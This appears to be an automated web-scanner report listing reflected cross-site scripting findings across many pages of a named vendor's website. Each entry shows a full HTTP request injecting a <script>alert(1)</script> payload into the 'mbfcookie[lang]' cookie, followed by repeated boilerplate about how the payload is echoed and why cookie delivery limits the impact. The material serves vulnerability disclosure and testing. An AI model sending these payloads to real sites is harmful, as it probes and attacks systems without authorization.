GET /en/meet-our-partners.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en8e5c7"><script>alert(1)</script>adb9c3d2480; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83849"><script>alert(1)</script>0ce72120c8d was submitted in the mbfcookie[lang] cookie. This input was echoed as 83849\"><script>alert(1)</script>0ce72120c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-monitoring-security-news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en83849"><script>alert(1)</script>0ce72120c8d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaac"><script>alert(1)</script>506cb8ffb11 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6eaac\"><script>alert(1)</script>506cb8ffb11 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-experts-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6eaac"><script>alert(1)</script>506cb8ffb11; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68ce7"><script>alert(1)</script>36f0a831d17 was submitted in the mbfcookie[lang] cookie. This input was echoed as 68ce7\"><script>alert(1)</script>36f0a831d17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en68ce7"><script>alert(1)</script>36f0a831d17; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fba46"><script>alert(1)</script>e9a751b4cd1 was submitted in the mbfcookie[lang] cookie. This input was echoed as fba46\"><script>alert(1)</script>e9a751b4cd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-research-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enfba46"><script>alert(1)</script>e9a751b4cd1; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b951"><script>alert(1)</script>d5453ad5523 was submitted in the mbfcookie[lang] cookie. This input was echoed as 6b951\"><script>alert(1)</script>d5453ad5523 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-security-visibility-products-235.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en6b951"><script>alert(1)</script>d5453ad5523; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a99e4"><script>alert(1)</script>5e86c72a29f was submitted in the mbfcookie[lang] cookie. This input was echoed as a99e4\"><script>alert(1)</script>5e86c72a29f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/network-solutions-we-provide.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena99e4"><script>alert(1)</script>5e86c72a29f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ceac"><script>alert(1)</script>63f3f812b9a was submitted in the mbfcookie[lang] cookie. This input was echoed as 9ceac\"><script>alert(1)</script>63f3f812b9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/news-events.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en9ceac"><script>alert(1)</script>63f3f812b9a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb73d"><script>alert(1)</script>c71247202a3 was submitted in the mbfcookie[lang] cookie. This input was echoed as bb73d\"><script>alert(1)</script>c71247202a3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partnership-inquiry-form.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbb73d"><script>alert(1)</script>c71247202a3; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b712"><script>alert(1)</script>d3b5d470576 was submitted in the mbfcookie[lang] cookie. This input was echoed as 1b712\"><script>alert(1)</script>d3b5d470576 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/services-network-support-maintenance-training-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1b712"><script>alert(1)</script>d3b5d470576; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1e4"><script>alert(1)</script>7b05d39a8bb was submitted in the mbfcookie[lang] cookie. This input was echoed as 4c1e4\"><script>alert(1)</script>7b05d39a8bb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solution-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4c1e4"><script>alert(1)</script>7b05d39a8bb; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-places-in-your-network.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/solutions-for-your-business-needs.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/technology-partners-4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/5.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /es/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/4.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /fr/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enbd6b5"><script>alert(1)</script>22edd466f97; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b884f"><script>alert(1)</script>27d3dcaf1dc was submitted in the mbfcookie[lang] cookie. This input was echoed as b884f\"><script>alert(1)</script>27d3dcaf1dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /it/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enb884f"><script>alert(1)</script>27d3dcaf1dc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8184b"><script>alert(1)</script>1699682b65d was submitted in the mbfcookie[lang] cookie. This input was echoed as 8184b\"><script>alert(1)</script>1699682b65d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
